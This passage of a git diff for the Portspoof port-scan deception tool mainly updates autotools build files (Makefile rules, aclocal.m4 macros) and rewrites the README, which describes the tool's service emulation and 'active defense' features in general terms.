1; } \ + END { if (nonempty) { for (i in files) print i; }; }'`; \ + shift; \ + if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ - $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ - $$tags $$unique; \ + if test $$# -gt 0; then \ + $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ + "$$@" $$unique; \ + else \ + $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ + $$unique; \ + fi; \ fi ctags: CTAGS CTAGS: ctags-recursive $(HEADERS) $(SOURCES) $(TAGS_DEPENDENCIES) \ $(TAGS_FILES) $(LISP) - tags=; \ - here=`pwd`; \ list='$(SOURCES) $(HEADERS) $(LISP) $(TAGS_FILES)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | \ - $(AWK) ' { files[$$0] = 1; } \ - END { for (i in files) print i; }'`; \ - test -z "$(CTAGS_ARGS)$$tags$$unique" \ + $(AWK) '{ files[$$0] = 1; nonempty = 1; } \ + END { if (nonempty) { for (i in files) print i; }; }'`; \ + test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ - $$tags $$unique + $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ - && cd $(top_srcdir) \ - && gtags -i $(GTAGS_ARGS) $$here + && $(am__cd) $(top_srcdir) \ + && gtags -i $(GTAGS_ARGS) "$$here" distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(DISTFILES) $(am__remove_distdir) - test -d $(distdir) || mkdir $(distdir) + test -d "$(distdir)" || mkdir "$(distdir)" @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ @@ -349,38 +391,55 @@ distdir: $(DISTFILES) if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ - if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ - cp -pR $(srcdir)/$$file $(distdir)$$dir || exit 1; \ + if test -d "$(distdir)/$$file"; then \ + find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ - cp -pR $$d/$$file $(distdir)$$dir || exit 1; \ + if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ + cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ + find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ + fi; \ + cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ - test -f $(distdir)/$$file \ - || cp -p $$d/$$file $(distdir)/$$file \ + test -f "$(distdir)/$$file" \ + || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done - list='$(DIST_SUBDIRS)'; for subdir in $$list; do \ + @list='$(DIST_SUBDIRS)'; for subdir in $$list; do \ if test "$$subdir" = .; then :; else \ test -d "$(distdir)/$$subdir" \ || $(MKDIR_P) "$(distdir)/$$subdir" \ || exit 1; \ - distdir=`$(am__cd) $(distdir) && pwd`; \ - top_distdir=`$(am__cd) $(top_distdir) && pwd`; \ - (cd $$subdir && \ + fi; \ + done + @list='$(DIST_SUBDIRS)'; for subdir in $$list; do \ + if test "$$subdir" = .; then :; else \ + dir1=$$subdir; dir2="$(distdir)/$$subdir"; \ + $(am__relativize); \ + new_distdir=$$reldir; \ + dir1=$$subdir; dir2="$(top_distdir)"; \ + $(am__relativize); \ + new_top_distdir=$$reldir; \ + echo " (cd $$subdir && $(MAKE) $(AM_MAKEFLAGS) top_distdir="$$new_top_distdir" distdir="$$new_distdir" \\"; \ + echo " am__remove_distdir=: am__skip_length_check=: am__skip_mode_fix=: distdir)"; \ + ($(am__cd) $$subdir && \ $(MAKE) $(AM_MAKEFLAGS) \ - top_distdir="$$top_distdir" \ - distdir="$$distdir/$$subdir" \ + top_distdir="$$new_top_distdir" \ + distdir="$$new_distdir" \ am__remove_distdir=: \ am__skip_length_check=: \ + am__skip_mode_fix=: \ distdir) \ || exit 1; \ fi; \ done - -find $(distdir) -type d ! -perm -755 -exec chmod u+rwx,go+rx {} \; -o \ + -test -n "$(am__skip_mode_fix)" \ + || find "$(distdir)" -type d ! -perm -755 \ + -exec chmod u+rwx,go+rx {} \; -o \ ! -type d ! -perm -444 -links 1 -exec chmod a+r {} \; -o \ ! -type d ! -perm -400 -exec chmod a+r {} \; -o \ ! -type d ! -perm -444 -exec $(install_sh) -c -m a+r {} {} \; \ - || chmod -R a+r $(distdir) + || chmod -R a+r "$(distdir)" dist-gzip: distdir tardir=$(distdir) && $(am__tar) | GZIP=$(GZIP_ENV) gzip -c >$(distdir).tar.gz $(am__remove_distdir) @@ -389,6 +448,14 @@ dist-bzip2: distdir tardir=$(distdir) && $(am__tar) | bzip2 -9 -c >$(distdir).tar.bz2 $(am__remove_distdir) +dist-lzma: distdir + tardir=$(distdir) && $(am__tar) | lzma -9 -c >$(distdir).tar.lzma + $(am__remove_distdir) + +dist-xz: distdir + tardir=$(distdir) && $(am__tar) | xz -c >$(distdir).tar.xz + $(am__remove_distdir) + dist-tarZ: distdir tardir=$(distdir) && $(am__tar) | compress -c >$(distdir).tar.Z $(am__remove_distdir) @@ -412,13 +479,17 @@ dist dist-all: distdir distcheck: dist case '$(DIST_ARCHIVES)' in \ *.tar.gz*) \ - GZIP=$(GZIP_ENV) gunzip -c $(distdir).tar.gz | $(am__untar) ;;\ + GZIP=$(GZIP_ENV) gzip -dc $(distdir).tar.gz | $(am__untar) ;;\ *.tar.bz2*) \ - bunzip2 -c $(distdir).tar.bz2 | $(am__untar) ;;\ + bzip2 -dc $(distdir).tar.bz2 | $(am__untar) ;;\ + *.tar.lzma*) \ + lzma -dc $(distdir).tar.lzma | $(am__untar) ;;\ + *.tar.xz*) \ + xz -dc $(distdir).tar.xz | $(am__untar) ;;\ *.tar.Z*) \ uncompress -c $(distdir).tar.Z | $(am__untar) ;;\ *.shar.gz*) \ - GZIP=$(GZIP_ENV) gunzip -c $(distdir).shar.gz | unshar ;;\ + GZIP=$(GZIP_ENV) gzip -dc $(distdir).shar.gz | unshar ;;\ *.zip*) \ unzip $(distdir).zip ;;\ esac @@ -426,9 +497,11 @@ distcheck: dist mkdir $(distdir)/_build mkdir $(distdir)/_inst chmod a-w $(distdir) + test -d $(distdir)/_build || exit 0; \ dc_install_base=`$(am__cd) $(distdir)/_inst && pwd | sed -e 's,^[^:\\/]:[\\/],/,'` \ && dc_destdir="$${TMPDIR-/tmp}/am-dc-$$$$/" \ - && cd $(distdir)/_build \ + && am__cwd=`pwd` \ + && $(am__cd) $(distdir)/_build \ && ../configure --srcdir=.. --prefix="$$dc_install_base" \ $(DISTCHECK_CONFIGURE_FLAGS) \ && $(MAKE) $(AM_MAKEFLAGS) \ @@ -450,13 +523,15 @@ distcheck: dist && rm -rf "$$dc_destdir" \ && $(MAKE) $(AM_MAKEFLAGS) dist \ && rm -rf $(DIST_ARCHIVES) \ - && $(MAKE) $(AM_MAKEFLAGS) distcleancheck + && $(MAKE) $(AM_MAKEFLAGS) distcleancheck \ + && cd "$$am__cwd" \ + || exit 1 $(am__remove_distdir) @(echo "$(distdir) archives ready for distribution: "; \ list='$(DIST_ARCHIVES)'; for i in $$list; do echo $$i; done) | \ sed -e 1h -e 1s/./=/g -e 1p -e 1x -e '$$p' -e '$$x' distuninstallcheck: - @cd $(distuninstallcheck_dir) \ + @$(am__cd) '$(distuninstallcheck_dir)' \ && test `$(distuninstallcheck_listfiles) | wc -l` -le 1 \ || { echo "ERROR: files left after uninstall:" ; \ if test -n "$(DESTDIR)"; then \ @@ -498,6 +573,7 @@ clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) + -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @@ -518,6 +594,8 @@ dvi-am: html: html-recursive +html-am: + info: info-recursive info-am: @@ -526,18 +604,28 @@ install-data-am: install-dvi: install-dvi-recursive +install-dvi-am: + install-exec-am: install-html: install-html-recursive +install-html-am: + install-info: install-info-recursive +install-info-am: + install-man: install-pdf: install-pdf-recursive +install-pdf-am: + install-ps: install-ps-recursive +install-ps-am: + installcheck-am: maintainer-clean: maintainer-clean-recursive @@ -560,14 +648,14 @@ ps-am: uninstall-am: -.MAKE: $(RECURSIVE_CLEAN_TARGETS) $(RECURSIVE_TARGETS) install-am \ - install-strip +.MAKE: $(RECURSIVE_CLEAN_TARGETS) $(RECURSIVE_TARGETS) ctags-recursive \ + install-am install-strip tags-recursive .PHONY: $(RECURSIVE_CLEAN_TARGETS) $(RECURSIVE_TARGETS) CTAGS GTAGS \ all all-am am--refresh check check-am clean clean-generic \ ctags ctags-recursive dist dist-all dist-bzip2 dist-gzip \ - dist-shar dist-tarZ dist-zip distcheck distclean \ - distclean-generic distclean-local distclean-tags \ + dist-lzma dist-shar dist-tarZ dist-xz dist-zip distcheck \ + distclean distclean-generic distclean-local distclean-tags \ distcleancheck distdir distuninstallcheck dvi dvi-am html \ html-am info info-am install install-am install-data \ install-data-am install-dvi install-dvi-am install-exec \ @@ -581,6 +669,7 @@ uninstall-am: distclean-local: rm -rf autom4te.cache + # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: diff --git a/NEWS b/NEWS index 1384d3c..3d70ee3 100644 --- a/NEWS +++ b/NEWS @@ -1 +1 @@ -See the ChangeLog file for the latest news. +NEWS \ No newline at end of file diff --git a/README b/README old mode 100644 new mode 100755 index ef13929..c17429d --- a/README +++ b/README @@ -2,19 +2,31 @@ Portspoof software overview Short description: - The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. + *Art of annoyance* + + The Portspoof program primary goal is to enhance OS security through a new service emulation technique that renders all standard port scanning results useless. + + *Art of Active (Offensive) Defense* + + Portspoof can be used as an 'Exploitation Framework Frontend', that turns your system into responsive and aggressive machine. In practice this usually means exploiting your attackers' tools and exploits. This approach is purely based on Active (Offensive) Defense concepts. + + It is meant to be a lightweight, fast, portable and secure addition to the any firewall system or security infrastructure. The general goal of the program is to make the port scanning software (Nmap/Unicornscan/etc) process slow and output very difficult to interpret, thus making the attack reconnaissance phase a challenging and bothersome task. - General benefits of using this software are: - - Protection against well known port scanners (all scanning results are chaotic and difficult to interpret) - - Possibility to use your current firewall rules to decide for which hosts "port spoofing" applies - - Port scanning detection functionality + The most important features that Portspoof has: + + - Portspoof is a userland software and does not require root privileges ! + - Binds to just one tcp port per a running instance + - Easily customizable through iptables rules + - Marginal CPU/memory usage (multithreaded) + - More than 8000 dynamic service signatures are supported ! + - Will help you to automate your Active Defense attacks against your attackers tools and scripts - http://portspoof.duszynski.eu + http://portspoof.org/ - Author: Piotr Duszynski (piotr@duszynski.eu) # Follow me at @drk1wi + Author: Piotr Duszynski (piotr [at] duszynski.eu) # License @@ -28,7 +40,6 @@ Other important files AUTHORS File with Author contact info Changelog What I have implemented - TODO What I am planning to implement in the upcoming versions FAQ Bug reporting and frequently asked questions diff --git a/README.md b/README.md old mode 100644 new mode 100755 diff --git a/TODO b/TODO deleted file mode 100644 index a680b1e..0000000 --- a/TODO +++ /dev/null @@ -1,12 +0,0 @@ -TODO ideas (To be implemented in the upcoming versions): - -* Imeplement support for configuration file - with possibility to define different signature spoofing schemes -* Improve reverse regex mechanism to support larger set of Nmap signatures -* Improve coding style and implemented algorithms -* Stable support for BSD, OSX and Windows OS - - - - - - diff --git a/aclocal.m4 b/aclocal.m4 index b6d1f15..1f41bc9 100644 --- a/aclocal.m4 +++ b/aclocal.m4 @@ -1,7 +1,7 @@ -# generated automatically by aclocal 1.10 -*- Autoconf -*- +# generated automatically by aclocal 1.11.1 -*- Autoconf -*- # Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, -# 2005, 2006 Free Software Foundation, Inc. +# 2005, 2006, 2007, 2008, 2009 Free Software Foundation, Inc. # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. @@ -11,12 +11,15 @@ # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. -m4_if(m4_PACKAGE_VERSION, [2.61],, -[m4_fatal([this file was generated for autoconf 2.61. -You have another version of autoconf. If you want to use that, -you should regenerate the build system entirely.], [63])]) +m4_ifndef([AC_AUTOCONF_VERSION], + [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl +m4_if(m4_defn([AC_AUTOCONF_VERSION]), [2.65],, +[m4_warning([this file was generated for autoconf 2.65. +You have another version of autoconf. It may work, but is not guaranteed to. +If you have problems, you may need to regenerate the build system entirely. +To do so, use the procedure documented by the package, typically `autoreconf'.])]) -# Copyright (C) 2002, 2003, 2005, 2006 Free Software Foundation, Inc. +# Copyright (C) 2002, 2003, 2005, 2006, 2007, 2008 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, @@ -28,10 +31,10 @@ you should regenerate the build system entirely.], [63])]) # generated from the m4 files accompanying Automake X.Y. # (This private macro should not be called outside this file.) AC_DEFUN([AM_AUTOMAKE_VERSION], -[am__api_version='1.10' +[am__api_version='1.11' dnl Some users find AM_AUTOMAKE_VERSION and mistake it for a way to dnl require some minimum version. Point them to the right macro. -m4_if([$1], [1.10], [], +m4_if([$1], [1.11.1], [], [AC_FATAL([Do not call $0, use AM_INIT_AUTOMAKE([$1]).])])dnl ]) @@ -45,10 +48,12 @@ m4_define([_AM_AUTOCONF_VERSION], []) # AM_SET_CURRENT_AUTOMAKE_VERSION # ------------------------------- # Call AM_AUTOMAKE_VERSION and AM_AUTOMAKE_VERSION so they can be traced. -# This function is AC_REQUIREd by AC_INIT_AUTOMAKE. +# This function is AC_REQUIREd by AM_INIT_AUTOMAKE. AC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION], -[AM_AUTOMAKE_VERSION([1.10])dnl -_AM_AUTOCONF_VERSION(m4_PACKAGE_VERSION)]) +[AM_AUTOMAKE_VERSION([1.11.1])dnl +m4_ifndef([AC_AUTOCONF_VERSION], + [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl +_AM_AUTOCONF_VERSION(m4_defn([AC_AUTOCONF_VERSION]))]) # AM_AUX_DIR_EXPAND -*- Autoconf -*- @@ -105,14 +110,14 @@ am_aux_dir=`cd $ac_aux_dir && pwd` # AM_CONDITIONAL -*- Autoconf -*- -# Copyright (C) 1997, 2000, 2001, 2003, 2004, 2005, 2006 +# Copyright (C) 1997, 2000, 2001, 2003, 2004, 2005, 2006, 2008 # Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 8 +# serial 9 # AM_CONDITIONAL(NAME, SHELL-CONDITION) # ------------------------------------- @@ -125,6 +130,7 @@ AC_SUBST([$1_TRUE])dnl AC_SUBST([$1_FALSE])dnl _AM_SUBST_NOTMAKE([$1_TRUE])dnl _AM_SUBST_NOTMAKE([$1_FALSE])dnl +m4_define([_AM_COND_VALUE_$1], [$2])dnl if $2; then $1_TRUE= $1_FALSE='#' @@ -138,14 +144,14 @@ AC_CONFIG_COMMANDS_PRE( Usually this means the macro was only invoked conditionally.]]) fi])]) -# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006 +# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2009 # Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 9 +# serial 10 # There are a few dirty hacks below to avoid letting `AC_PROG_CC' be # written in clear, in which case automake, when reading aclocal.m4, @@ -202,6 +208,16 @@ AC_CACHE_CHECK([dependency style of $depcc], if test "$am_compiler_list" = ""; then am_compiler_list=`sed -n ['s/^#*\([a-zA-Z0-9]*\))$/\1/p'] < ./depcomp` fi + am__universal=false + m4_case([$1], [CC], + [case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac], + [CXX], + [case " $depcc " in #( + *\ -arch\ *\ -arch\ *) am__universal=true ;; + esac]) + for depmode in $am_compiler_list; do # Setup a source with many dependencies, because some compilers # like to wrap large dependency lists on column 80 (with \), and @@ -219,7 +235,17 @@ AC_CACHE_CHECK([dependency style of $depcc], done echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf + # We check with `-c' and `-o' for the sake of the "dashmstdout" + # mode. It turns out that the SunPro C++ compiler does not properly + # handle `-M -o', and we need to detect this. Also, some Intel + # versions had trouble with output in subdirs + am__obj=sub/conftest.${OBJEXT-o} + am__minus_obj="-o $am__obj" case $depmode in + gcc) + # This depmode causes a compiler race in universal mode. + test "$am__universal" = false || continue + ;; nosideeffect) # after this tag, mechanisms are not by side-effect, so they'll # only be used when explicitly requested @@ -229,19 +255,23 @@ AC_CACHE_CHECK([dependency style of $depcc], break fi ;; + msvisualcpp | msvcmsys) + # This compiler won't grok `-c -o', but also, the minuso test has + # not run yet. These depmodes are late enough in the game, and + # so weak that their functioning should not be impacted. + am__obj=conftest.${OBJEXT-o} + am__minus_obj= + ;; none) break ;; esac - # We check with `-c' and `-o' for the sake of the "dashmstdout" - # mode. It turns out that the SunPro C++ compiler does not properly - # handle `-M -o', and we need to detect this. if depmode=$depmode \ - source=sub/conftest.c object=sub/conftest.${OBJEXT-o} \ + source=sub/conftest.c object=$am__obj \ depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ - $SHELL ./depcomp $depcc -c -o sub/conftest.${OBJEXT-o} sub/conftest.c \ + $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ >/dev/null 2>conftest.err && grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && - grep sub/conftest.${OBJEXT-o} sub/conftest.Po > /dev/null 2>&1 && + grep $am__obj sub/conftest.Po > /dev/null 2>&1 && ${MAKE-make} -s -f confmf > /dev/null 2>&1; then # icc doesn't choke on unknown options, it will just issue warnings # or remarks (even with -Werror). So we grep stderr for any message @@ -298,57 +328,68 @@ _AM_SUBST_NOTMAKE([AMDEPBACKSLASH])dnl # Generate code to set up dependency tracking. -*- Autoconf -*- -# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005 +# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2008 # Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -#serial 3 +#serial 5 # _AM_OUTPUT_DEPENDENCY_COMMANDS # ------------------------------ AC_DEFUN([_AM_OUTPUT_DEPENDENCY_COMMANDS], -[for mf in $CONFIG_FILES; do - # Strip MF so we end up with the name of the file. - mf=`echo "$mf" | sed -e 's/:.*$//'` - # Check whether this is an Automake generated Makefile or not. - # We used to match only the files named `Makefile.in', but - # some people rename them; so instead we look at the file content. - # Grep'ing the first line is not enough: some people post-process - # each Makefile.in and add a new line on top of each file to say so. - # Grep'ing the whole file is not good either: AIX grep has a line - # limit of 2048, but all sed's we know have understand at least 4000. - if sed 10q "$mf" | grep '^#.*generated by automake' > /dev/null 2>&1; then - dirpart=`AS_DIRNAME("$mf")` - else - continue - fi - # Extract the definition of DEPDIR, am__include, and am__quote - # from the Makefile without running `make'. - DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"` - test -z "$DEPDIR" && continue - am__include=`sed -n 's/^am__include = //p' < "$mf"` - test -z "am__include" && continue - am__quote=`sed -n 's/^am__quote = //p' < "$mf"` - # When using ansi2knr, U may be empty or an underscore; expand it - U=`sed -n 's/^U = //p' < "$mf"` - # Find all dependency output files, they are included files with - # $(DEPDIR) in their names. We invoke sed twice because it is the - # simplest approach to changing $(DEPDIR) to its actual value in the - # expansion. - for file in `sed -n " - s/^$am__include $am__quote\(.*(DEPDIR).*\)$am__quote"'$/\1/p' <"$mf" | \ - sed -e 's/\$(DEPDIR)/'"$DEPDIR"'/g' -e 's/\$U/'"$U"'/g'`; do - # Make sure the directory exists. - test -f "$dirpart/$file" && continue - fdir=`AS_DIRNAME(["$file"])` - AS_MKDIR_P([$dirpart/$fdir]) - # echo "creating $dirpart/$file" - echo '# dummy' > "$dirpart/$file" +[{ + # Autoconf 2.62 quotes --file arguments for eval, but not when files + # are listed without --file. Let's play safe and only enable the eval + # if we detect the quoting. + case $CONFIG_FILES in + *\'*) eval set x "$CONFIG_FILES" ;; + *) set x $CONFIG_FILES ;; + esac + shift + for mf + do + # Strip MF so we end up with the name of the file. + mf=`echo "$mf" | sed -e 's/:.*$//'` + # Check whether this is an Automake generated Makefile or not. + # We used to match only the files named `Makefile.in', but + # some people rename them; so instead we look at the file content. + # Grep'ing the first line is not enough: some people post-process + # each Makefile.in and add a new line on top of each file to say so. + # Grep'ing the whole file is not good either: AIX grep has a line + # limit of 2048, but all sed's we know have understand at least 4000. + if sed -n 's,^#.*generated by automake.*,X,p' "$mf" | grep X >/dev/null 2>&1; then + dirpart=`AS_DIRNAME("$mf")` + else + continue + fi + # Extract the definition of DEPDIR, am__include, and am__quote + # from the Makefile without running `make'. + DEPDIR=`sed -n 's/^DEPDIR = //p' < "$mf"` + test -z "$DEPDIR" && continue + am__include=`sed -n 's/^am__include = //p' < "$mf"` + test -z "am__include" && continue + am__quote=`sed -n 's/^am__quote = //p' < "$mf"` + # When using ansi2knr, U may be empty or an underscore; expand it + U=`sed -n 's/^U = //p' < "$mf"` + # Find all dependency output files, they are included files with + # $(DEPDIR) in their names. We invoke sed twice because it is the + # simplest approach to changing $(DEPDIR) to its actual value in the + # expansion. + for file in `sed -n " + s/^$am__include $am__quote\(.*(DEPDIR).*\)$am__quote"'$/\1/p' <"$mf" | \ + sed -e 's/\$(DEPDIR)/'"$DEPDIR"'/g' -e 's/\$U/'"$U"'/g'`; do + # Make sure the directory exists. + test -f "$dirpart/$file" && continue + fdir=`AS_DIRNAME(["$file"])` + AS_MKDIR_P([$dirpart/$fdir]) + # echo "creating $dirpart/$file" + echo '# dummy' > "$dirpart/$file" + done done -done +} ])# _AM_OUTPUT_DEPENDENCY_COMMANDS @@ -368,13 +409,13 @@ AC_DEFUN([AM_OUTPUT_DEPENDENCY_COMMANDS], # Do all the work for Automake. -*- Autoconf -*- # Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, -# 2005, 2006 Free Software Foundation, Inc. +# 2005, 2006, 2008, 2009 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 12 +# serial 16 # This macro actually does too much. Some checks are only needed if # your package does certain things. But this isn't really a big deal. @@ -391,7 +432,7 @@ AC_DEFUN([AM_OUTPUT_DEPENDENCY_COMMANDS], # arguments mandatory, and then we can depend on a new Autoconf # release and drop the old call support. AC_DEFUN([AM_INIT_AUTOMAKE], -[AC_PREREQ([2.60])dnl +[AC_PREREQ([2.62])dnl dnl Autoconf wants to disallow AM_ names. We explicitly allow dnl the ones we care about. m4_pattern_allow([^AM_[A-Z]+FLAGS$])dnl @@ -442,8 +483,8 @@ AM_MISSING_PROG(AUTOCONF, autoconf) AM_MISSING_PROG(AUTOMAKE, automake-${am__api_version}) AM_MISSING_PROG(AUTOHEADER, autoheader) AM_MISSING_PROG(MAKEINFO, makeinfo) -AM_PROG_INSTALL_SH -AM_PROG_INSTALL_STRIP +AC_REQUIRE([AM_PROG_INSTALL_SH])dnl +AC_REQUIRE([AM_PROG_INSTALL_STRIP])dnl AC_REQUIRE([AM_PROG_MKDIR_P])dnl # We need awk for the "check" target. The system "awk" is bad on # some platforms. @@ -451,24 +492,37 @@ AC_REQUIRE([AC_PROG_AWK])dnl AC_REQUIRE([AC_PROG_MAKE_SET])dnl AC_REQUIRE([AM_SET_LEADING_DOT])dnl _AM_IF_OPTION([tar-ustar], [_AM_PROG_TAR([ustar])], - [_AM_IF_OPTION([tar-pax], [_AM_PROG_TAR([pax])], - [_AM_PROG_TAR([v7])])]) + [_AM_IF_OPTION([tar-pax], [_AM_PROG_TAR([pax])], + [_AM_PROG_TAR([v7])])]) _AM_IF_OPTION([no-dependencies],, [AC_PROVIDE_IFELSE([AC_PROG_CC], - [_AM_DEPENDENCIES(CC)], - [define([AC_PROG_CC], - defn([AC_PROG_CC])[_AM_DEPENDENCIES(CC)])])dnl + [_AM_DEPENDENCIES(CC)], + [define([AC_PROG_CC], + defn([AC_PROG_CC])[_AM_DEPENDENCIES(CC)])])dnl AC_PROVIDE_IFELSE([AC_PROG_CXX], - [_AM_DEPENDENCIES(CXX)], - [define([AC_PROG_CXX], - defn([AC_PROG_CXX])[_AM_DEPENDENCIES(CXX)])])dnl + [_AM_DEPENDENCIES(CXX)], + [define([AC_PROG_CXX], + defn([AC_PROG_CXX])[_AM_DEPENDENCIES(CXX)])])dnl AC_PROVIDE_IFELSE([AC_PROG_OBJC], - [_AM_DEPENDENCIES(OBJC)], - [define([AC_PROG_OBJC], - defn([AC_PROG_OBJC])[_AM_DEPENDENCIES(OBJC)])])dnl + [_AM_DEPENDENCIES(OBJC)], + [define([AC_PROG_OBJC], + defn([AC_PROG_OBJC])[_AM_DEPENDENCIES(OBJC)])])dnl ]) +_AM_IF_OPTION([silent-rules], [AC_REQUIRE([AM_SILENT_RULES])])dnl +dnl The `parallel-tests' driver may need to know about EXEEXT, so add the +dnl `am__EXEEXT' conditional if _AM_COMPILER_EXEEXT was seen. This macro +dnl is hooked onto _AC_COMPILER_EXEEXT early, see below. +AC_CONFIG_COMMANDS_PRE(dnl +[m4_provide_if([_AM_COMPILER_EXEEXT], + [AM_CONDITIONAL([am__EXEEXT], [test -n "$EXEEXT"])])])dnl ]) +dnl Hook into `_AC_COMPILER_EXEEXT' early to learn its expansion. Do not +dnl add the conditional right here, as _AC_COMPILER_EXEEXT may be further +dnl mangled by Autoconf and run in a shell conditional statement. +m4_define([_AC_COMPILER_EXEEXT], +m4_defn([_AC_COMPILER_EXEEXT])[m4_provide([_AM_COMPILER_EXEEXT])]) + # When config.status generates a header, we must update the stamp-h file. # This file resides in the same directory as the config header @@ -479,18 +533,19 @@ AC_PROVIDE_IFELSE([AC_PROG_OBJC], # our stamp files there. AC_DEFUN([_AC_AM_CONFIG_HEADER_HOOK], [# Compute $1's index in $config_headers. +_am_arg=$1 _am_stamp_count=1 for _am_header in $config_headers :; do case $_am_header in - $1 | $1:* ) + $_am_arg | $_am_arg:* ) break ;; * ) _am_stamp_count=`expr $_am_stamp_count + 1` ;; esac done -echo "timestamp for $1" >`AS_DIRNAME([$1])`/stamp-h[]$_am_stamp_count]) +echo "timestamp for $_am_arg" >`AS_DIRNAME(["$_am_arg"])`/stamp-h[]$_am_stamp_count]) -# Copyright (C) 2001, 2003, 2005 Free Software Foundation, Inc. +# Copyright (C) 2001, 2003, 2005, 2008 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, @@ -501,7 +556,14 @@ echo "timestamp for $1" >`AS_DIRNAME([$1])`/stamp-h[]$_am_stamp_count]) # Define $install_sh. AC_DEFUN([AM_PROG_INSTALL_SH], [AC_REQUIRE([AM_AUX_DIR_EXPAND])dnl -install_sh=${install_sh-"\$(SHELL) $am_aux_dir/install-sh"} +if test x"${install_sh}" != xset; then + case $am_aux_dir in + *\ * | *\ *) + install_sh="\${SHELL} '$am_aux_dir/install-sh'" ;; + *) + install_sh="\${SHELL} $am_aux_dir/install-sh" + esac +fi AC_SUBST(install_sh)]) # Copyright (C) 2003, 2005 Free Software Foundation, Inc. @@ -527,13 +589,13 @@ AC_SUBST([am__leading_dot])]) # Check to see how 'make' treats includes. -*- Autoconf -*- -# Copyright (C) 2001, 2002, 2003, 2005 Free Software Foundation, Inc. +# Copyright (C) 2001, 2002, 2003, 2005, 2009 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. -# serial 3 +# serial 4 # AM_MAKE_INCLUDE() # ----------------- @@ -542,7 +604,7 @@ AC_DEFUN([AM_MAKE_INCLUDE], [am_make=${MAKE-make} cat > confinc << 'END' am__doit: - @echo done + @echo this is the am__doit target .PHONY: am__doit END # If we don't find an include directive, just comment out the code. @@ -552,24 +614,24 @@ am__quote= _am_result=none # First try GNU make style include. echo "include confinc" > confmf -# We grep out `Entering directory' and `Leaving directory' -# messages which can occur if `w' ends up in MAKEFLAGS. -# In particular we don't look at `^make:' because GNU make might -# be invoked under some other name (usually "gmake"), in which -# case it prints its new name instead of `make'. -if test "`$am_make -s -f confmf 2> /dev/null | grep -v 'ing directory'`" = "done"; then - am__include=include - am__quote= - _am_result=GNU -fi +# Ignore all kinds of additional output from `make'. +case `$am_make -s -f confmf 2> /dev/null` in #( +*the\ am__doit\ target*) + am__include=include + am__quote= + _am_result=GNU + ;; +esac # Now try BSD make style include. if test "$am__include" = "#"; then echo '.include "confinc"' > confmf - if test "`$am_make -s -f confmf 